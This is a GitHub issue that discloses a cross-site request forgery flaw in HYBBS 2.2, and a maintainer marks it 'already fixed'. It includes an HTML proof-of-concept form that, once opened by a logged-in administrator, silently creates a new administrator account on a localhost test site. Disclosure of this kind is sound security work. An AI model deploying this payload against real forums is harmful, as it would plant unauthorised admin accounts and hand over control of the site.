Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
When the administrator logged in, open the page with poc , it can add the administrator account. Here, my test site's url is http://localhost/HYBBS2.2 .
poc: html code below:
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/HYBBS2.2/?admin/user.html" method="POST"> <input type="hidden" name="gn" value="2" /> <input type="hidden" name="user" value="admin2" /> <input type="hidden" name="group" value="1" /> <input type="hidden" name="email" value="xx@126.com" /> <input type="hidden" name="pass" value="admin123" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
already fixed
Sorry, something went wrong.
No branches or pull requests
When the administrator logged in, open the page with poc , it can add the administrator account.
Here, my test site's url is http://localhost/HYBBS2.2 .
poc:
html code below:
The text was updated successfully, but these errors were encountered: